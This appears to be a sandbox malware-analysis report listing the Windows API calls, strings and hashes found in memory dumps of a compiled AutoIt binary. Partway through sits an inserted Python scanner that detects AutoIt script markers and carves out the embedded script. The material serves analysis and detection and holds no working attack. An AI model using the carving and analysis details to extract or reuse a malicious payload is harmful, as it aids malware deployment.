              • GetWindowRect.USER32(00000000), ref: 0020A683
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0020A69B
              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0020A6B3
                • Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
              • String ID: 0$tooltips_class32
              • API String ID: 1297703922-3619404913
              • Opcode ID: c78fc26a1c47541fcfa60c8c93552d269f474ce3a5852bd36373da97de65be7e
              • Instruction ID: 5f7e630a71d6b0c218e5a47a7b4c2317e50dc9eaf216b8060dddd8a7dbdde3c5
              • Opcode Fuzzy Hash: c78fc26a1c47541fcfa60c8c93552d269f474ce3a5852bd36373da97de65be7e
              • Instruction Fuzzy Hash: AA718970160306AFDB20CF28DC49F667BF9EB89300F48052CF995872A2C772E956CB12
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 002046AB
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002046F6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharMessageSendUpper
              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
              • API String ID: 3974292440-4258414348
              • Opcode ID: a89e1514c04b559b3417536d15e53465391a22642154914fe1daded5953a7519
              • Instruction ID: eb451f13b2089809f4e89df72a9f8b00f30f53081343a6f067c59f1dc5766941
              • Opcode Fuzzy Hash: a89e1514c04b559b3417536d15e53465391a22642154914fe1daded5953a7519
              • Instruction Fuzzy Hash: 3091A2B46243029FCB14FF10C491A6AB7A5AFA9314F04886DF9965B3E3CB31ED16CB41
              APIs
              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0020BB6E
              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00209431), ref: 0020BBCA
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0020BC03
              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0020BC46
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0020BC7D
              • FreeLibrary.KERNEL32(?), ref: 0020BC89
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0020BC99
              • DestroyIcon.USER32(?,?,?,?,?,00209431), ref: 0020BCA8
              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0020BCC5
              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0020BCD1
                • Part of subcall function 001A313D: __wcsicmp_l.LIBCMT ref: 001A31C6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
              • String ID: .dll$.exe$.icl
              • API String ID: 1212759294-1154884017
              • Opcode ID: 6fc9f4763c7f92ad11aea7cf07411311fab8ed0ab128202578da490390e9a628
              • Instruction ID: 61b6b83e40bc7cd81f078a74c7afbd72ab9c521a16511c58232e3798714edaa7
              • Opcode Fuzzy Hash: 6fc9f4763c7f92ad11aea7cf07411311fab8ed0ab128202578da490390e9a628
              • Instruction Fuzzy Hash: 6261EF71950319BFEB25DF64DC85BBA77A8EB08710F10411AFD15D61D2DB70AAA0CBA0
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,0020FB78), ref: 001EA0FC
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • LoadStringW.USER32(?,?,00000FFF,?), ref: 001EA11E
              • __swprintf.LIBCMT ref: 001EA177
              • __swprintf.LIBCMT ref: 001EA190
              • _wprintf.LIBCMT ref: 001EA246
              • _wprintf.LIBCMT ref: 001EA264
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LoadString__swprintf_wprintf$_memmove
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%!
              • API String ID: 311963372-699068131
              • Opcode ID: a52d6af0cd3c9a9fe1418226fb561f3ba14011cde3c1338b978631d0c3647e9e
              • Instruction ID: 3e77ddbb1be5bbff5acebe8583e1cd21ec52f5399b3d509d4bf64662c774678d
              • Opcode Fuzzy Hash: a52d6af0cd3c9a9fe1418226fb561f3ba14011cde3c1338b978631d0c3647e9e
              • Instruction Fuzzy Hash: 0D516C7190460AAACF15FBE0CD86EEEB779AF25300F600165F515720A1EB31AF58CF61
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • CharLowerBuffW.USER32(?,?), ref: 001EA636
              • GetDriveTypeW.KERNEL32 ref: 001EA683
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA6CB
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA702
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA730
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
              • API String ID: 2698844021-4113822522
              • Opcode ID: 8ed236e7ba2f0c86e46a1fdeecb9275f56dbacf7d8a66600e16e038c4d41ba21
              • Instruction ID: 63347269fd2e1481a8fdfdd7ef1bec8f7e1f32cc73b6735c86039514accd022f
              • Opcode Fuzzy Hash: 8ed236e7ba2f0c86e46a1fdeecb9275f56dbacf7d8a66600e16e038c4d41ba21
              • Instruction Fuzzy Hash: AD5156B51147059FC704EF21C88186AB7E8FFA8718F54496CF896572A1DB31EE0ACF52
              APIs
              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001EA47A
              • __swprintf.LIBCMT ref: 001EA49C
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 001EA4D9
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001EA4FE
              • _memset.LIBCMT ref: 001EA51D
              • _wcsncpy.LIBCMT ref: 001EA559
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001EA58E
              • CloseHandle.KERNEL32(00000000), ref: 001EA599
              • RemoveDirectoryW.KERNEL32(?), ref: 001EA5A2
              • CloseHandle.KERNEL32(00000000), ref: 001EA5AC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
              • String ID: :$\$\??\%s
              • API String ID: 2733774712-3457252023
              • Opcode ID: d27d6bcce16cbddcb6a145de3d0303852c6a512b1a4d77af5cb2f5af6d36c42d
              • Instruction ID: aba8f606733f66e29453647aa5154287971be4d88a98c8af0daf9c10c0d9391e
              • Opcode Fuzzy Hash: d27d6bcce16cbddcb6a145de3d0303852c6a512b1a4d77af5cb2f5af6d36c42d
              • Instruction Fuzzy Hash: AA31BEB6540249ABDB20DFA1DC49FEF77BCEF89701F5041B6FA08D2161EB70A6448B25
              APIs
              • __wsplitpath.LIBCMT ref: 001EDC7B
              • _wcscat.LIBCMT ref: 001EDC93
              • _wcscat.LIBCMT ref: 001EDCA5
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001EDCBA
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EDCCE
              • GetFileAttributesW.KERNEL32(?), ref: 001EDCE6
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 001EDD00
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EDD12
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
              • String ID: *.*
              • API String ID: 34673085-438819550
              • Opcode ID: cf6b8d37c80d872fe4e203be56b0322885513757858a60d0b3f24c4b26d0f512
              • Instruction ID: a939ffe7e14e5bebaee39367a9559f44b3c91a1cdf86de3e7eefd81500e6f788
              • Opcode Fuzzy Hash: cf6b8d37c80d872fe4e203be56b0322885513757858a60d0b3f24c4b26d0f512
              • Instruction Fuzzy Hash: A481F4715047809FCB24EF65D8859AEB7E8BF99300F19882EF889C7250E731DD44CB52
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0020C4EC
              • GetFocus.USER32 ref: 0020C4FC
              • GetDlgCtrlID.USER32(00000000), ref: 0020C507
              • _memset.LIBCMT ref: 0020C632
              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0020C65D
              • GetMenuItemCount.USER32(?), ref: 0020C67D
              • GetMenuItemID.USER32(?,00000000), ref: 0020C690
              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0020C6C4
              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0020C70C
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0020C744
              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0020C779
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
              • String ID: 0
              • API String ID: 1296962147-4108050209
              • Opcode ID: 3446a2afca5295f011796f8e181268d3d4e4b9d9ea7bb765a651e9854fefe82b
              • Instruction ID: 9ed4bf53304ac5805c1d9f656508213eb0e5eb3f47f8887ccf302b14160e977c
              • Opcode Fuzzy Hash: 3446a2afca5295f011796f8e181268d3d4e4b9d9ea7bb765a651e9854fefe82b
              • Instruction Fuzzy Hash: 9B81A0B45183029FD720CF14D988A6BBBE8FF89314F20062DF995972A2D771D915CFA2
              APIs
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D8766
                • Part of subcall function 001D874A: GetLastError.KERNEL32(?,001D822A,?,?,?), ref: 001D8770
                • Part of subcall function 001D874A: GetProcessHeap.KERNEL32(00000008,?,?,001D822A,?,?,?), ref: 001D877F
                • Part of subcall function 001D874A: HeapAlloc.KERNEL32(00000000,?,001D822A,?,?,?), ref: 001D8786
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D879D
                • Part of subcall function 001D87E7: GetProcessHeap.KERNEL32(00000008,001D8240,00000000,00000000,?,001D8240,?), ref: 001D87F3
                • Part of subcall function 001D87E7: HeapAlloc.KERNEL32(00000000,?,001D8240,?), ref: 001D87FA
                • Part of subcall function 001D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001D8240,?), ref: 001D880B
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001D8458
              • _memset.LIBCMT ref: 001D846D
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001D848C
              • GetLengthSid.ADVAPI32(?), ref: 001D849D
              • GetAce.ADVAPI32(?,00000000,?), ref: 001D84DA
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001D84F6
              • GetLengthSid.ADVAPI32(?), ref: 001D8513
              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001D8522
              • HeapAlloc.KERNEL32(00000000), ref: 001D8529
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001D854A
              • CopySid.ADVAPI32(00000000), ref: 001D8551
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001D8582
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001D85A8
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001D85BC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
              • String ID:
              • API String ID: 3996160137-0
              • Opcode ID: 50c02b0fc7bbfd541fda40c9ea7d1d174c0515099ddcb0ba7df7351369e89fc4
              • Instruction ID: b1df28807e785c16f484b6cf870ec895a43a0673e1a45907b76741d48b1210e6
              • Opcode Fuzzy Hash: 50c02b0fc7bbfd541fda40c9ea7d1d174c0515099ddcb0ba7df7351369e89fc4
              • Instruction Fuzzy Hash: FB613C71900209AFDF10DFA5ED49AEEBBB9FF04710F14826AF915A7291DB319A05CF60
              APIs
              • GetDC.USER32(00000000), ref: 001F76A2
              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001F76AE
              • CreateCompatibleDC.GDI32(?), ref: 001F76BA
              • SelectObject.GDI32(00000000,?), ref: 001F76C7
              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 001F771B
              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 001F7757
              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 001F777B
              • SelectObject.GDI32(00000006,?), ref: 001F7783
              • DeleteObject.GDI32(?), ref: 001F778C
              • DeleteDC.GDI32(00000006), ref: 001F7793
              • ReleaseDC.USER32(00000000,?), ref: 001F779E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
              • String ID: (
              • API String ID: 2598888154-3887548279
              • Opcode ID: 22caa261a21ea7994bb43ca5139dafc7f142e2160f3873a1a48a603f4ef4a4e4
              • Instruction ID: edb9e03796ccef0c898e477cb3b7a5b28cad4e8966b8400f0f986f3890c4a529
              • Opcode Fuzzy Hash: 22caa261a21ea7994bb43ca5139dafc7f142e2160f3873a1a48a603f4ef4a4e4
              • Instruction Fuzzy Hash: 6F516C75904309EFDB25CFA8DD88EAEBBB9EF48310F14852DFA5997251D731A840CB60
              APIs
                • Part of subcall function 001A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00186C6C,?,00008000), ref: 001A0BB7
                • Part of subcall function 001848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001848A1,?,?,001837C0,?), ref: 001848CE
              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00186D0D
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00186E5A
                • Part of subcall function 001859CD: _wcscpy.LIBCMT ref: 00185A05
                • Part of subcall function 001A387D: _iswctype.LIBCMT ref: 001A3885
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
              • API String ID: 537147316-1018226102
              • Opcode ID: 774ab2aae67258239831e92e67dcaaa716ba94ab6126bff1be4a99a25270d1c8
              • Instruction ID: 27e4f905523b60d9cbf76744ee12655f1e81a7552025290023e5ab70472d24f8
              • Opcode Fuzzy Hash: 774ab2aae67258239831e92e67dcaaa716ba94ab6126bff1be4a99a25270d1c8
              • Instruction Fuzzy Hash: 730289341083419FC724EF24C881AAFBBE5EFA9354F14492DF496972A2DB30DA49CF52
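The string table of the function above (`AU3!`, `EA06`, `>>>AUTOIT SCRIPT<<<`, the `#include` and directive-syntax errors) is the AutoIt runtime's script loader locating and parsing the embedded script. A triage scanner for those markers, written as an added example for this report and not Joe Sandbox or AutoIt code: it assumes (not stated on the page) that the two 4-byte strings are compared back to back, so an embedded script is introduced by the 8-byte header `AU3!EA06`, that the legacy marker may be stored as UTF-16LE as well as ASCII, and it runs on constructed buffers rather than the analysed file.

```python
"""Triage scanner for the compiled-AutoIt markers listed in the loader
function's string table ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<").

Added example for this report; not Joe Sandbox or AutoIt code.
Assumptions not stated on the page: the two 4-byte strings form one
8-byte header "AU3!EA06" in a file; the legacy marker can be stored as
UTF-16LE as well as ASCII; the sample buffers below are constructed.
"""
from typing import Dict, List, Optional

# Markers from the listing's String ID line.
AU3_HEADER = b"AU3!EA06"                 # assumption: "AU3!" + "EA06" as one 8-byte header
LEGACY_MARKER = b">>>AUTOIT SCRIPT<<<"   # also present in the interpreter's own code section


def _utf16le(s: bytes) -> bytes:
    return s.decode("ascii").encode("utf-16-le")


PATTERNS: Dict[str, bytes] = {
    "au3_header": AU3_HEADER,
    "legacy_ascii": LEGACY_MARKER,
    "legacy_utf16": _utf16le(LEGACY_MARKER),
}


def _find_all(buf: bytes, pat: bytes) -> List[int]:
    """Every offset at which pat occurs in buf."""
    offs, i = [], buf.find(pat)
    while i >= 0:
        offs.append(i)
        i = buf.find(pat, i + 1)
    return offs


def find_autoit_markers(buf: bytes) -> Dict[str, List[int]]:
    """Map each marker name to the offsets where it occurs; absent keys mean no hit."""
    return {name: offs for name, pat in PATTERNS.items() if (offs := _find_all(buf, pat))}


def is_compiled_autoit(buf: bytes) -> bool:
    """Triage verdict. Only the 8-byte header proves an embedded script: the
    legacy marker is a string of the loader function itself (see the listing
    above), so it is present in every AutoIt interpreter stub and is only a hint."""
    return "au3_header" in find_autoit_markers(buf)


def carve_script(buf: bytes) -> Optional[bytes]:
    """Bytes following the first AU3!EA06 header, i.e. what an AutoIt
    decompiler expects as input; None when there is no header."""
    i = buf.find(AU3_HEADER)
    return None if i < 0 else buf[i + len(AU3_HEADER):]


# Constructed sample buffers (not the analysed file).
_STUB = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 100
SAMPLE_INTERPRETER_ONLY = _STUB + _utf16le(LEGACY_MARKER) + b"\x00" * 32
SAMPLE_WITH_SCRIPT = SAMPLE_INTERPRETER_ONLY + AU3_HEADER + b"\x13\x37" * 64

if __name__ == "__main__":
    for name, buf in (("interpreter only", SAMPLE_INTERPRETER_ONLY),
                      ("with embedded script", SAMPLE_WITH_SCRIPT)):
        print(name, find_autoit_markers(buf), "compiled AutoIt:", is_compiled_autoit(buf))
```

Run it over the memory dumps (`.sdmp`) rather than only the on-disk file: a loader that decrypts its payload at runtime shows these markers only in memory, which is where this report's function listing comes from.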
              APIs
              • _memset.LIBCMT ref: 001845F9
              • GetMenuItemCount.USER32(00246890), ref: 001BD7CD
              • GetMenuItemCount.USER32(00246890), ref: 001BD87D
              • GetCursorPos.USER32(?), ref: 001BD8C1
              • SetForegroundWindow.USER32(00000000), ref: 001BD8CA
              • TrackPopupMenuEx.USER32(00246890,00000000,?,00000000,00000000,00000000), ref: 001BD8DD
              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001BD8E9
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
              • String ID:
              • API String ID: 2751501086-0
              • Opcode ID: d4e9a89909cdf6da9c9063a6958bb2d2c9ee6de0e07814314c2f0c2e09527061
              • Instruction ID: ad0ee96cc5e3186d8315af08e825ed8fb4e8ac3b50e9db86a308e733e1d77feb
              • Opcode Fuzzy Hash: d4e9a89909cdf6da9c9063a6958bb2d2c9ee6de0e07814314c2f0c2e09527061
              • Instruction Fuzzy Hash: 2C71D570640216BFEB389F55EC49FEABF69FF05368F200216F514A61E1DBB15850DB90
              APIs
              • VariantInit.OLEAUT32(?), ref: 001F8BEC
              • CoInitialize.OLE32(00000000), ref: 001F8C19
              • CoUninitialize.OLE32 ref: 001F8C23
              • GetRunningObjectTable.OLE32(00000000,?), ref: 001F8D23
              • SetErrorMode.KERNEL32(00000001,00000029), ref: 001F8E50
              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00212C0C), ref: 001F8E84
              • CoGetObject.OLE32(?,00000000,00212C0C,?), ref: 001F8EA7
              • SetErrorMode.KERNEL32(00000000), ref: 001F8EBA
              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001F8F3A
              • VariantClear.OLEAUT32(?), ref: 001F8F4A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
              • String ID: ,,!
              • API String ID: 2395222682-3142458726
              • Opcode ID: 5b2fb64f140ba9a142d8bcf8231c01886ed28d8b57309a3af2f3b08f8ec8a121
              • Instruction ID: b8576db05443b306e20794246d86df267064c8ebb0239619cfc721dd6a5eeb9f
              • Opcode Fuzzy Hash: 5b2fb64f140ba9a142d8bcf8231c01886ed28d8b57309a3af2f3b08f8ec8a121
              • Instruction Fuzzy Hash: 42C12471208309AFD700EF64C88496BB7E9FF89748F04496DF68A9B251DB71ED05CB52
              APIs
              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              Strings
              Memory Dump Source
